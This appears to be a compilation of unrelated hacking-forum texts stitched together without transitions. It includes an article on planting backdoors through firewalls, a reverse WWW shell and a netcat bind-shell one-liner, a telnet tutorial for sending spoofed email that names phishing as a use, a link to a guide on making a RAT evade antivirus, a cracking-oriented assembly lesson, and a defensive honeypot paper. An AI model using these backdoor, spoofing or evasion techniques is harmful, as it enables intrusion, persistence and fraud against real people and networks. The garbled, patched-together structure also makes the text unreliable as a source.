15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).

16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).

17) File siganture verification tool = sigverif.exe

18 Volume Contro = sndvol32.exe (I've included this for those people that lose it from the System Notification area).

19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).

20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).

21) Mcft Telnet Client = telnet.exe

22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).

23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).

Note:- Some of them might not run in Windows XP Home edition

----[ Introduction

This article describes possible backdoors through different firewall architectures. However, the material can also be applied to other environments to describe how hackers (you?) cover their access to a system.

Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does it's job and b) is not easily detectable. The kind of backdoor needed depends on the firewall architecture used.

As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun.




----[ Firewall Architectures

There are two basic firewall architectures and each has an enhanced version.

Packet Filters:

This is a host or router which checks each packet against an allow/deny ruletable before routing it through the correct interface. There are very simple ones which can only filter from the origin host, destination host and destination port, as well as good ones which can also decide based on incoming interface, source port, day/time and some tcp or ip flags.
This could be a simple router, f.e. any Cisco, or a Linux machine with firewalling activated (ipfwadm).

Stateful Filters:

This is the enhanced version of a packet filter. It still does the same checking against a rule table and only routes if permitted, but it also keeps track of the state information such as TCP sequence numbers. Some pay attention to application protocols which allows tricks such as only opening ports to the interiour network for ftp-data channels which were specified in a permitted ftp session. These filters can (more or less) get UDP packets (f.e. for DNS and RPC) securely through the firewall. (Thats because UDP is a stateless protocol. And it's more difficult for RPC services.)
This could be a great OpenBSD machine with the ip-filter software, a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1.

Proxies / Circuit Level Gateways:

A proxy as a firewall host is simply any server which has no routing activated and instead has proxy software installe.
Examples of proxy servers which may be used are squid for WWW, a sendmail relay configuration and/or just a sockd.

Application Gateways:

This is the enhanced version of a proxy. Like a proxy, for every application which should get through the firewall a software must be installed and running to proxy it. However, the application gateway is smart and checks every request and answer, f.e. that an outgoing ftp only may download data but not upload any, and that the data has got no virus, no buffer overflows are generated in answers etc. One can argue that squid is an application gateway, because it does many sanity checks and let you filter stuff but it was not programmed for the installation in a secure environment and still has/had security bugs.
A good example for a freeware kit for this kind is the TIS firewall toolkit (fwtk).

Most firewalls that vendors sell on the market are hybrid firwalls, which means they've got more than just one type implemented; for example the IBM Firewall is a simple packet filter with socks and a few proxies. I won't discuss which firewall product is the best, because this is not a how-to-by-a-firewall paper, but I will say this: application gateways are by far the most secure firewalls, although money, speed, special protocols, open network policies, stupidity, marketing hype and bad management might rule them out.


----[ Getting in

Before we talk about what backdoors are the best for which firewall architecture we should shed a light on how to get through a firewall the first time. Note that getting through a firewall is not a plug-n-play thing for script-kiddies, this has to be carefully planned and done.

The four main possibilities:

Insider:

There's someone inside the company (you, girl/boy-friend, chummer) who installs the backdoor. This is the easiest way of course.

Vulnerable Services:

Nearly all networks offer some kind of services, such as incoming email, WWW, or DNS. These may be on the firewall host itself, a host in the DMZ (here: the zone in front of the firewall, often not protected by a firewall) or on an internal machine. If an attacker can find a hole in one of those services, he's got good chances to get in. You'd laugh if you'd see how many "firewalls" run sendmail for mail relaying ...

Vulnerable External Server:

People behind a firewall sometimes work on external machines. If an attacker can hack these, he can cause serious mischief such as the many X attacks if the victim uses it via an X-relay or sshd. The attacker could also send fake ftp answers to overflow a buffer in the ftp client software, replace a gif picture on a web server with one which crashs netscape and executes a command (I never checked if this actually works, it crashs, yeah, but I didn't look through this if this is really an exploitable overflow). There are many possibilities with this but it needs some knowledge about the company. However, an external web server of the company is usually a good start. Some firewalls are configured to allow incoming telnet from some machines, so anyone can sniff these and get it. This is particulary true for the US, where academic environments and industry/military work close together.

Hijacking Connections:

Many companies think that if they allow incoming telnet with some kind of secure authentication like SecureID (secure algo?, he) they are safe. Anyone can hijack these after the authentication and get in ... Another way of using hijacked connections is to modify replies in the protocol implementation to generate a buffer overflow (f.e. with X).

Trojans:

Many things can be done with a trojan horse. This could be a gzip file which generates a buffer overflow (well, needs an old gzip to be installed), a tar file which tampers f.e. ~/.logout to execute something, or an executable or source code which was modified to get the hacker in somehow. To get someone running this, mail spoofing could be used or replacing originals on an external server which internal employees access to update their software regulary (ftp xfer files and www logs can be checked to get to know which files these are).




----[ Placing the Backdoors

An intelligent hacker will not try to put the backdoors on machines in the firewall segment, because these machines are usually monitored and checked regulary. It's the internal machines which are usually unprotected and without much administration and security checks.

I will now talk about some ideas of backdoors which could be implemented. Note that programs which will/would run on an stateful filter will of course work with a normal packet filter too, same for the proxy. Ideas for an application gateway backdoor will work for any architecture.
Some of them are "active" and others "passive". "Active" backdoors are those which can be used by a hacker anytime he wishes, a "passive" one triggers itself by time/event so an attacker has to wait for this to happen.

Packet Filters:

It's hard to find a backdoor which gets through this one but does not work for any other. The few ones which comes into my mind
is a) the ack-telnet. It works like a normal telnet/telnetd except it does not work with the normal tcp handshake/protocol but uses TCP ACK packets only. Because they look like they belong to an already established (and allowed) connection, they are permitted. This can be easily coded with the spoofit.h of Coder's Spoofit project (http://reptile.rug.ac.be/~coder).
b) Loki from Phrack 49/51 could be used too to establish a tunnel with icmp echo/reply packets. But some coding would be needed to to be done.
c) daemonshell-udp is a backdoor shell via UDP
(http://www.thc.org look for thc-uht1.tgz)
d) Last but not least, most "firewall systems" with only a screening router/firewall let any incoming tcp connection from the source port 20 to a highport (>1023) through to allow the (non-passive) ftp protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one.

Stateful Filters:

Here a hacker must use programs which initiates the connection from the secure network to his external 0wned server. There are many out there which could be used:
active:
tunnel from Phrack 52.
ssh with the -R option (much better than tunnel ... it's a legtimitate program on a computer and it encrypts the datastream). passive:
netcat compiled with the execute option and run with a time option to connect to the hacker machine (ftp.avian.org).
reverse_shell from the thc-uht1.tgz package (see above) does the same.

Proxies / Circuit Level Gateways:
If socks is used on the firewall, someone can use all those stuff for the stateful filter and "socksify" them. (www.socks.nec.com) For more advanced tools you'd should take a look at the application gateway section.

Application Gateways:
Now we get down to the interesting stuff. These beasts can be intelligent so some brain is needed.
active:
(re-)placing a cgi-script on the webserver of the company, which allows remote access. This is unlikely because it's rare that the webserver is in the network, not monitored/ checked/audited and accessible from the internet. I hope nobody needs an example on such a thing Wink
(re-placing) a service/binary on the firewall. This is dangerous because those are audited regulary and sometimes even sniffed on permanent ...
Loading a loadable module into the firewall kernel wich hides itself and gives access to it's master. The best solution for an active backdoor but still dangerous. passive:
E@mail - an email account/mailer/reader is configured in a way to extract hidden commands in an email (X-Headers with weird stuff) and send them back with output if wanted/needed.
WWW - this is hard stuff. A daemon on an internal machine does http requests to the internet, but the requests are in real the answers of commands which were issued by a rogue www server in a http reply. This nice and easy beast is presented below (->Backdoor Example: The Reverse WWW Shell)
DNS - same concept as above but with dns queries and replies. Disadvantage is that it can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this example needs still much coding to be any effective)




----[ Backdoor Example: The Reverse WWW Shell

This backdoor should work through any firewall which has got the security policy to allow users to surf the WWW (World Wide Waste) for information for the sake and profit of the company.
For a better understanding take a look at the following picture and try to remember it onwards in the text:

+--------+ +------------+ +-------------+
|internal|--------------------| FIREWALL |--------------|server owned |
| host | internal network +------------+ internet |by the hacker|
+--------+ +-------------+
SLAVE MASTER

Well, a program is run on the internal host, which spawns a child every day at a special time. For the firewall, this child acts like a user, using his netscape client to surf on the internet. In reality, this child executes a local shell and connects to the www server owned by the hacker on the internet via a legitimate looking http request and sends it ready signal. The legitimate looking answer of the www server owned by the hacker are in reality the commands the child will execute on it's machine it the local shell. All traffic will be converted (I'll not call this "encrypted", I'm not Micro$oft) in a Base64 like structure and given as a value for a cgi-string to prevent caching.

Example of a connection:

Slave
GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj HTTP/1.0

Master replies with
g5mAlfbknz

The GET of the internal host (SLAVE) is just the command prompt of the shell, the answer is an encoded "ls" command from the hacker on the external server (MASTER). Some gimmicks:

The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because if the shell hangs for whatever reason you can check & fix the next day; if an administrator sees connects to the hacker's server and connects to it himself he will just see a broken webserver because there's a Token (Password) in the encoded cgi GET request; WWW Proxies (f.e. squid) are supported; program masks it's name in the process listing ...

Best of all: master & slave program are just one 260-lines perl file ... Usage is simple: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the MASTER just before it's time that the slave tries to connect.

Well, why coding it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to use it on a system which hasn't got perl installed, search for a similar machine with perl install, get the a3 compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and run that one.

The code for this nice and easy tool is appended in the section THE CODE after my last words. If you've got updates/ideas/critics for it drop me an email. If you think this text or program is lame, write me at root@localhost. Check out http://www.thc.org for updates.


----[ The Source

Grab it here ...

rwwwshell v2.0


----[ Security

Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a tight application gateway firewall with a strict policy. email should be put on a centralized mail server, and DNS resolving only done on the WWW/FTP proxies and access to WWW only prior proxy authentication. However, this is not enough. An attacker can tamper the mailreader to execute the commands extracted from the crypted X-Headers or implement the http authentication into the reverse www-shell (it's simple). Also checking the DNS and WWW logs/caches regulary with good tools can be defeated by switching the external servers every 3-20 calls or use aliases.

A secure solution would be to set up a second network which is connected to the internet, and the real one kept seperated - but tell this the employees ... A good firewall is a big improvement, and also an Intrusion Detection Systems can help. But nothing can stop a dedicated attacker.

This video tutorial give you a brief information about
Scanning
checking for the lives systems
banner grabbing
scenario

tools
angry ip
nmap
netscan tool pro
banner grabbing method
netcraft-os detion tools
sockschain

enumeration
what is enumeration
snmp enumeration

eaxmple-connect using null session
tools-dumpsec
system identification number
get acct tool
solar winds

tools-userinfo
tool-userip

buffer overflow
reasons for attack
nops
defence against buffer over flow attack
buffer overflow
cryptography
piks
rsa attack and algorithms
code breaking methodologies
penetration testing
vulnerability assessement
terms of engagement
filtering devices
impact of threat
phases of penetration testing

http://rapidshare.com/files/50056939/Buffer_Overflow.part2.rar
http://rapidshare.com/files/50467225/Buffer_Overflow.part1.rar
http://rapidshare.com/files/51507987/Scanning.part2.rar
http://rapidshare.com/files/52580269/Scanning.part1.rar

What is Telnet ?

you do not need to worry about it right now if know read another of my tutorial . for now just remember telnet is a protocol for connecting two computers on internet

Why do we want to send anyone fake email ?
Well most commonly to play pranks on friends
you can use them for phishing attacks or social engineering
whatever your purpose maybe remember unless you find a totally anonymous server your ip is logged so if the person complaints you can be caught

that is why i recommend you to use shell accounts or proxies

Enough of this shit, i wanna type something !!!

So here we go
In this tutorial i am gonna use yahoo's smtp server
Step 1: launch command prompt or bash shell

Step 2: Connect to yahoo's smtp server
type telnet mx1.mail.yahoo.com 25
you'll response as in the image



Step 3: Type helo



Step 4: Type mail from:



Step 5: Type rcpt to:



Step 6: type data




Step 7 : enter Data type as follows

subject : whatever you want
from : whatever you want
to: whatever you want
date: none

your emails body

.




Do not forget to press enter after every line also to end your msg type " . "(dot) and press enter

Step 7: type quit to close your connection



If you want to send email to person with a hotmail or gmail or anyother account then you'll have to telnet to smtp server of that email site

thats all regarding sending fake email
Suggestions and Feedbacks are appreciated
Bye :-

Avada Kedavra

This tutorial will help u make Bitfrost RAT undetectable by AV

http://rapidshare.com/files/9060332/Bitfrost-Ud.pdf.html

=============
[BEGIN LESSON]
=============
To begin to start learning reverse engineering u MUST know some ASM
aka the computers machine code.

ok lets learn this stuff then

heres some ASM just to let u know what it looks like

Code:

00xx:00xxxx Call 00403214
00xx:00xxxx Test Eax,Eax
00xx:00xxxx Jne 00043242
00xx:00xxxx Ret
00xx:00xxxx Cmp Ebx,Esi


so what does that mean?

i'm just going to start off by explaining each important ASM instruction
and how the CPU works.

Inside the CPU is a Register control, this has lots of pre-defined variables inside, here are some of the ones u will most likey see.

Code:
AX/EAX - Acummulator Register used for storing numbers and the output of sums
BX/EBX - Base Register - Usually for storing numbers for calculations
CX/ECX - Counter Register - used in loops , incremented or decremented
IP/EIP - Intruction Pointer - Stores the address(line number) of the next command


Now thats a very brief description of the instructions.


=========
COMMANDS
=========

{********************** MOV ******************************}
Code:
MOV dest,sour - This is the most common instruction it simply moves data from one register to another.

e.g
Code:

MOV AX,56 - (Move 56 into AX)
MOV BX,AX - (Move AX into BX, so BX contains 56 because we had 56 in AX)



{********************** ADD ******************************}
Code:
ADD op1,op2 - Adds two registers together and puts the result in op1.


e.g
Code:

MOV BX,23
MOV AX,10
ADD BX,AX


Adds 10 to 23
so the answer 33 is left in BX


{********************** SUB ******************************}
Code:
SUB - Subtract


Code:
MOV BX,23
MOV AX,10
ADD BX,AX
MOV CX,10
SUB BX,CX


See if you can follow that

so BX=33 at the moment then we take CX away from it (which is 10) which leaves the result in BX, so BX would now equal 23.




(*********** Important ASM commands for Cracking *************}

ok we must learn this stuff first.
Code:

CALL 200

- This calls another set of instructions at 200 then returns back to the next line after it was called

e.g

Code:
100: MOV AX,10
102: MOV BX,20
104: CALL 200 ----------->---------------------|
106: MOV DX,20 <-| \./
108: MOV CX,DX | 200: SUB AX,CX
| 202: MOV CX,02
-------------- < 204: RET
206: blah
208: blah


There don't bother trying to follow the code as i just made it up just take note to the cycle, when it meets the CALL command it jumps to line number provided (200 in this case) and excutes the code there until it see's the RET command goes back to the next line in the main program (RET=Return).



======
JUMPS
======

In asm there is lots of different conditions for the jump command, they mostly depend on "flags" flags are boolean variables in the CPU, for those
of you that don't know what a boolean is.

It is a variable which has to states 'on or off' in this case '0 or 1'.

Most programs have a Serial check routine that is stored in a call after this call AX is set to 0 or 1 this then has a logical AND performed on it aka TEST AX,AX this sets the ZERO flag to on or off, so its either Z or NZ zero or not zero then a jump with a conditional connected to the zero flag is done, that probably not explained very well but i'l explain it better later when we get to cracking, for now heres some of our important jump commands

Code:
JMP xxxx - Jumps to x no matter what
JNZ xxxx - Jump if the Zero flag is not set
JZ xxxx - Jump if the zero flag is set
JNE xxxx - Jump if not equal
JE xxxx - jump if equal
JG xxxx - jump if greater
JL xxxx - jump if less than
JA xxxx - jump if above
JB xxxx - jump if below
JGE xxxx - jump if greater than or equal to
JBE xxxx - jump if Below than or equal to


so many, but thats not all, just try and remember those, its quiet logical really.


======
Stack
======

k nearly done Smiley

The stack is an area of memory which is used to put data from registers into the stack for later storage. When placing a register's contents into the stack, its called "Pushing" when taking a value out of the register its called "Poping".


The stack works on LIFO - Last In first Out.
e.g

Code:
MOV AX,1
MOV BX,2
PUSH AX
PUSH BX
POP AX
POP BX



So whats the value of AX,BX now? well lets go through it

Code:
Ax=1
Bx=2


push AX - look at stack table 1

Code:
1)Stack
1


push Bx look at stack table 2

Code:
2)stack
2
1


pop ax - takes the first value out of the stack and puts into ax
which is 2

pop bx - puts 1 into bx because 2 has been taken from the stack so now
1 is on top


So from that you can see that the stack puts every thing on top.


{************ Last Word On ASM ***************}

Just 1 more thing to cover.

This is brackets when u see brackets around some think it is refering to that address.

Code:
Mov AX,2
MOV [300],AX - This moves AX to memory area 300


or

Code:
MOV [0032543],500
CALL [0032543] - this calls the procedure at line 500


you should get that by now i hope Wink

{**********************************************************************************}
k that was ASM you should now have a rough idea of how it works


==========
[END LESSON]
==========


Leave comments if you benefited from the lesson.


And if u want to know more abt cracking
like
how it is done
what is the procedure for that
and for some examples
download this .txt file
http://www.4shared.com/file/25161321/fa300782/Howtocrk.html
it will help u more

Honeypots are an exciting new technology with enormous potential for the security community. The concepts were first introduced by several icons in computer security, specifically Cliff Stoll in the book The Cuckoo's Egg", and Bill Cheswick's paper " An Evening with Berferd." Since then, honeypots have continued to evolve, developing into the powerful security tools they are today. The purpose of this paper is to explain exactly what honeypots are, their advantages and disadvatages, and their value to the security.

Definitions
The first step to understanding honeypots is defining what a honeypot is. This can be harder then it sounds. Unlike firewalls or Intrusion Detection Systems, honeypots do not solve a specific problem. Instead, they are a highly flexible tool that comes in many shapes and sizes. They can do everything from detecting encrypted attacks in IPv6 networks to capturing the latest in on-line credit card fraud. Its is this flexibility that gives honeypots their true power. It is also this flexibility that can make them challenging to define and understand. As such, I use the following definition to define what a honeypot is.

A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource.


This is a general defintion covering all the different manifistations of honeypots. We will be discussing in this paper different examples of honeypots and their value to security. All will fall under the definition we use above, their value lies in the bad guys interacting with them. Conceptually almost all honeypots work they same. They are a resource that has no authorized activity, they do not have any production value. Theoreticlly, a honeypot should see no traffic because it has no legitimate activity. This means any interaction with a honeypot is most likely unauthorized or malicious activity. Any connection attempts to a honeypot are most likely a probe, attack, or compromise. While this concept sounds very simple (and it is), it is this very simplicity that give honeypots their tremendous advantages (and disadvantages). I highlight these below.

Advantages: Honeypots are a tremendously simply concept, which gives them some very powerful strengths.


* Small data sets of high value: Honeypots collect small amounts of information. Instead of logging a one GB of data a day, they can log only one MB of data a day. Instead of generating 10,000 alerts a day, they can generate only 10 alerts a day. Remember, honeypots only capture bad activity, any interaction with a honeypot is most likely unauthorized or malicious activity. As such, honeypots reduce 'noise' by collectin only small data sets, but information of high value, as it is only the bad guys. This means its much easier (and cheaper) to analyze the data a honeypot collects and derive value from it.

* New tools and tactics: Honeypots are designed to capture anything thrown at them, including tools or tactics never seen before.

* Minimal resources: Honeypots require minimal resources, they only capture bad activity. This means an old Pentium computer with 128MB of RAM can easily handle an entire class B network sitting off an OC-12 network.

* Encryption or IPv6: Unlike most security technologies (such as IDS systems) honeypots work fine in encrypted or IPv6 environments. It does not matter what the bad guys throw at a honeypot, the honeypot will detect and capture it.

* Information: Honeypots can collect in-depth information that few, if any other technologies can match.

* Simplicty: Finally, honeypots are conceptually very simple. There are no fancy algorithms to develop, state tables to maintain, or signatures to update. The simpler a technology, the less likely there will be mistakes or misconfigurations.



Disadvantages: Like any technology, honeypots also have their weaknesses. It is because of this they do not replace any current technology, but work with existing technologies.

# Limited view: Honeypots can only track and capture activity that directly interacts with them. Honeypots will not capture attacks against other systems, unless the attacker or threat interacts with the honeypots also.

# Risk: All security technologies have risk. Firewalls have risk of being penetrated, encryption has the risk of being broken, IDS sensors have the risk of failing to detect attacks. Honeypots are no different, they have risk also. Specifically, honeypots have the risk of being taken over by the bad guy and being used to harm other systems. This risk various for different honeypots. Depending on the type of honeypot, it can have no more risk then an IDS sensor, while some honeypots have a great deal of risk. We identify which honeypots have what levels of risk later in the paper.


It is how you leverage these advantages and disadvantages that defines the value of your honeypot (which we discuss later).

Types of Honeypots
Honeypots come in many shapes and sizes, making them difficult to get a grasp of. To help us better understand honeypots and all the different types, we break them down into two general categories, low-interaction and high-interaction honeypots. These categories helps us understand what type of honeypot you are dealing with, its strengths, and weaknesses. Interaction defines the level of activity a honeypot allows an attacker. Low-interaction honeypots have limited interaction, they normally work by emulating services and operating systems. Attacker activity is limited to the level of emulation by the honeypot. For example, an emulated FTP service listening on port 21 may just emulate a FTP login, or it may support a variety of additional FTP commands. The advantages of a low-interaction honeypot is their simplicity. These honeypots tend to be easier to deploy and maintain, with minimal risk. Usually they involve installing software, selecting the operating systems and services you want to emulate and monitor, and letting the honeypot go from there. This plug and play approach makes deploying them very easy for most organizations. Also, the emulated services mitigate risk by containing the attacker's activity, the attacker never has access to an operating system to attack or harm others. The main disadvantages with low interaction honeypots is that they log only limited information and are designed to capture known activity. The emulated services can only do so much. Also, its easier for an attacker to detect a low-interaction honeypot, no matter how good the emulation is, skilled attacker can eventually detect their presence. Examples of low-interaction honeypots include Specter, Honeyd, and KFSensor.

High-interaction honeypots are different, they are usually complex solutions as they involve real operating systems and applications. Nothing is emulated, we give attackers the real thing. If you want a Linux honeypot running an FTP server, you build a real Linux system running a real FTP server. The advantages with such a solution are two fold. First, you can capture extensive amounts of information. By giving attackers real systems to interact with, you can learn the full extent of their behavior, everything from new rootkits to international IRC sessions. The second advantage is high-interaction honeypots make no assumptions on how an attacker will behave. Instead, they provide an open environment that captures all activity. This allows high-interaction solutions to learn behavior we would not expect. An excellent example of this is how a Honeynet captured encoded back door commands on a non-standard IP protocol (specifically IP protocol 11, Network Voice Protocol). However, this also increases the risk of the honeypot as attackers can use these real operating system to attack non-honeypot systems. As result, additional technologies have to be implement that prevent the attacker from harming other non-honeypot systems. In general, high-interaction honeypots can do everything low-interaction honeypots can do and much more. However, they can be more complext to deploy and maintain. Examples of high-interaction honeypots include Symantec Decoy Server and Honeynets. You can find a complete listing of both low and high interaction honeypots at Honeypot Solutions page. To better understand both low and high interaction honeypots lets look at two examples. We will start with the low-interaction honeypot Honeyd.

Honeyd: Low-interaction honeypot
Honeyd is a low-interaction honeypot. Developed by Niels Provos, Honeyd is OpenSource and designed to run primarily on Unix systems (though it has been ported to Windows). Honeyd works on the concept of monitoring unused IP space. Anytime it sees a connection attempt to an unused IP, it intercepts the connection and then interacts with the attacker, pretending to be the victim. By default, Honeyd detects and logs any connection to any UDP or TCP port. In addition, you can configure emulated services to monitor specific ports, such as an emulated FTP server monitoring TCP port 21. When an attacker connects to the emulated service, not only does the honeypot detect and log the activity, but it captures all of the attacker's interaction with the emulated service. In the case of the emulated FTP server, we can potentially capture the attacker's login and password, the commands they issue, and perhaps even learn what they are looking for or their identity. It all depends on the level of emulation by the honeypot. Most emulated services work the same way. They expect a specific type of behavior, and then are programmed to react in a predetermined way. If attack A does this, then react this way. If attack B does this, then respond this way. The limitation is if the attacker does something that the emulation does not expect, then it does not know how to respond. Most low-interaction honeypots, including Honeyd, simply generate an error message. You can see what commands the emulated FTP server for Honeyd supports by review the source code.

Some honeypots, such as Honeyd, can not only emulate services, but emulate actual operating systems. In other words, Honeyd can appear to the attacker to be a Cisco router, WinXP webserver, or Linux DNS server. There are several advantages to emulating different operating systems. First, the honeypot can better blend in with existing networks if the honeypot has the same appearance and behavior of production systems. Second, you can target specific attackers by providing systems and services they often target, or systems and services you want to learn about. There are two elements to emulating operating systems. The first is with the emulated services. When an attacker connects to an emulated service, you can have that service behave like and appear to be a specific OS. For example, if you have a service emulating a webserver, and you want your honeypot to appear to be a Win2000 server, then you would emulate the behavior of a IIS webserver. For Linux, you would emulate the behavior of an Apache webserver. Most honeypots emulate OS' in this manner. Some sophisticated honeypots take this emulation one step farther (as Honeyd does). Not only do they emulate at the service level, but at the IP stack level. If someone uses active fingerprinting measures to determine the OS type of your honeypot most honeypots respond with the IP stack of whatever OS the honeypot is installed on. Honeyd spoof the replies, making not only the emulated services, but emulated IP stacks behave as the operating systems would. The level of emulation and sophistication depends on what honeypot technology you chose to use.

Honeynets: High-interaction honeypot
Honeynets are a prime example of high-interaction honeypot. Honeynets are not a product, they are not a software solution that you install on a computer. Instead, Honeyents are an architecture, an entire network of computers designed to attacked. The idea is to have an architecture that creates a highly controlled network, one where all activity is controlled and captured. Within this network we place our intended victims, real computers running real applications. The bad guys find, attack, and break into these systems on their own initiative. When they do, they do not realize they are within a Honeynet. All of their activity, from encrypted SSH sessions to emails and files uploads, are captured without them knowing it. This is done by inserting kernel modules on the victim systems that capture all of the attacker's actions. At the same time, the Honeynet controls the attacker's activity. Honeynets do this using a Honeywall gateway. This gateway allows inbound traffic to the victim systems, but controls the outbound traffic using intrusion prevention technologies. This gives the attacker the flexibility to interact with the victim systems, but prevents the attacker from harming other non-Honeynet computers. An example of such a deployment can be seen in Figure 1.

Value of Honeypots
Now that we have understanding of two general categories of honepyots, we can focus on their value. Specifically, how we can use honeypots. Once again, we have two general categories, honeypots can be used for production purposes or research. When used for production purposes, honeypots are protecting an organization. This would include preventing, detecting, or helping organizations respond to an attack. When used for research purposes, honeypots are being used to collect information. This information has different value to different organizations. Some may want to be studying trends in attacker activity, while others are interested in early warning and prediction, or law enforcement. In general, low-interaction honeypots are often used for production purposes, while high-interaction honeypots are used for research purposes. However, either type of honeypot can be used for either purpose. When used for production purposes, honeypots can protect organizations in one of three ways; prevention, detection, and response. We will take a more in-depth look at how a honeypot can work in all three.

Honeypots can help prevent attacks in several ways. The first is against automated attacks, such as worms or auto-rooters. These attacks are based on tools that randomly scan entire networks looking for vulnerable systems. If vulnerable systems are found, these automated tools will then attack and take over the system (with worms self-replicating, copying themselves to the victim). One way that honeypots can help defend against such attacks is slowing their scanning down, potentially even stopping them. Called sticky honeypots, these solutions monitor unused IP space. When probed by such scanning activity, these honeypots interact with and slow the attacker down. They do this using a variety of TCP tricks, such as a Windows size of zero, putting the attacker into a holding pattern. This is excellent for slowing down or preventing the spread of a worm that has penetrated your internal organization. One such example of a sticky honeypot is LaBrea Tarpit. Sticky honeypots are most often low-interaction solutions (you can almost call them 'no-interaction solutions', as they slow the attacker down to a crawl . Honeypots can also be protect your organization from human attackers. The concept is deception or deterrence. The idea is to confuse an attacker, to make him waste his time and resources interacting with honeypots. Meanwhile, your organization has detected the attacker's activity and have the time to respond and stop the attacker. This can be even taken one step farther. If an attacker knows your organization is using honeypots, but does not know which systems are honeypots and which systems are legitimate computers, they may be concerned about being caught by honeypots and decided not to attack your organizations. Thus the honeypot deters the attacker. An example of a honeypot designed to do this is Deception Toolkit, a low-interaction honeypot.

The second way honeypots can help protect an organization is through detection. Detection is critical, its purpose is to identify a failure or breakdown in prevention. Regardless of how secure an organization is, there will always be failures, if for no other reasons then humans are involved in the process. By detecting an attacker, you can quickly react to them, stopping or mitigating the damage they do. Tradtionally, detection has proven extremely difficult to do. Technologies such as IDS sensors and systems logs haven proven ineffective for several reasons. They generate far too much data, large percentage of false positives, inability to detect new attacks, and the inability to work in encrypted or IPv6 environments. Honeypots excel at detection, addressing many of these problems of traditional detection. Honeypots reduce false positives by capturing small data sets of high value, capture unknown attacks such as new exploits or polymorphic shellcode, and work in encrypted and IPv6 environments. You can learn more about this in the paper Honeypots: Simple, Cost Effective Detection. In general, low-interaction honeypots make the best solutions for detection. They are easier to deploy and maintain then high-interaction honeypots and have reduced risk.

The third and final way a honeypot can help protect an organization is in reponse. Once an organization has detected a failure, how do they respond? This can often be one of the greatest challenges an organization faces. There is often little information on who the attacker is, how they got in, or how much damage they have done. In these situations detailed information on the attacker's activity are critical. There are two problems compounding incidence response. First, often the very systems compromised cannot be taken offline to analyze. Production systems, such as an organization's mail server, are so critical that even though its been hacked, security professionals may not be able to take the system down and do a proper forensic analysis. Instead, they are limited to analyze the live system while still providing production services. This cripiles the ability to analyze what happend, how much damage the attacker has done, and even if the attacker has broken into other systems. The other problem is even if the system is pulled offline, there is so much data pollution it can be very difficult to determine what the bad guy did. By data pollution, I mean there has been so much activity (user's logging in, mail accounts read, files written to databases, etc) it can be difficult to determine what is normal day-to-day activity, and what is the attacker. Honeypots can help address both problems. Honeypots make an excellent incident resonse tool, as they can quickly and easily be taken offline for a full forensic analysis, without impacting day-to-day business operations. Also, the only activity a honeypot captures is unauthorized or malicious activity. This makes hacked honeypots much easier to analyze then hacked production systems, as any data you retrieve from a honeypot is most likely related to the attacker. The value honeypots provide here is quickly giving organizations the in-depth information they need to rapidly and effectively respond to an incident. In general, high-interaction honeypots make the best solution for response. To respond to an intruder, you need in-depth knowledge on what they did, how they broke in, and the tools they used. For that type of data you most likely need the capabilities of a high-interaction honeypot.

Up to this point we have been talking about how honeypots can be used to protect an organization. We will now talk about a different use for honeypots, research. Honeypots are extremely powerful, not only can they be used to protect your organization, but they can be used to gain extensive information on threats, information few other technologies are capable of gathering. One of the greatest problems security professionals face is a lack of information or intelligence on cyber threats. How can we defend against an enemy when we don't even know who that enemy is? For centuries military organizations have depended on information to better understand who their enemy is and how to defend against them. Why should information security be any different? Research honeypots address this by collecting information on threats. This information can then be used for a variety of purposes, including trend analysis, identifying new tools or methods, identifying attackers and their communities, early warning and prediction, or motivations. One of the most well known examples of using honeypots for research is the work done by the Honeynet Project, an all volunteer, non-profit security research organization. All of the data they collect is with Honeynet distributed around the world. As threats are constantly changing, this information is proving more and more critical.

Getting Started
If you have never worked with honeypots before and want to learn more, I recommend starting with simple low-interaction honeypots, such as KFSensor or Specter for Window users, or Honeyd for Unix users. There is even a Honeyd Linux Toolkit for easy deployment of Honeyd on Linux computers. Low-interaction honeypots have the advantage of being easier to deploy and little risk, as they contain the activity of the attacker. Once you have had an opportunity to work with low-interaction solutions, you can take the skills and understanding you have developed and work with high-interaction solutions. To help you better understand honeypots, below is a chart summarizing what we just covered.

Low-interaction
Solution emulates operating systems and services.


* Easy to install and deploy. Usually requires simply installing and configuring software on a computer.

* Minimal risk, as the emulated services control what attackers can and cannot do.

* Captures limited amounts of information, mainly transactional data and some limited interaction.



High-interaction
No emulation, real operating systems and services are provided.


* Can capture far more information, including new tools, communications, or attacker keystrokes.

* Can be complex to install or deploy (commercial versions tend to be much simpler).

* Increased risk, as attackers are provided real operating systems to interact with.


Finally, no paper on honeypots would be complete without a discussion about legal issues. There are many misconcepts about the legal issues of honeypots. Instead of briefly covering the legal issues in this paper, I will be releasing a new paper at the end of May, 2003 dedicated to the legal issues of honeypot technologies.

Conclusion
The purpose of this paper was to define the what honeypots are and their value to the security community. We identified two different types of honeypots, low-interaction and high-interaction honeypots. Interaction defines how much activity a honeypot allows an attacker. The value of these solutions is both for production or research purposes. Honeypots can be used for production purposes by preventing, detecting, or responding to attacks. Honeypots can also be used for research, gathering information on threats so we can better understand and defend against them. If you are interested in learning more about honeypots, you may want to consider the book Honeypots: Tracking Hackers, the first and only book dedicated to honeypot technologies

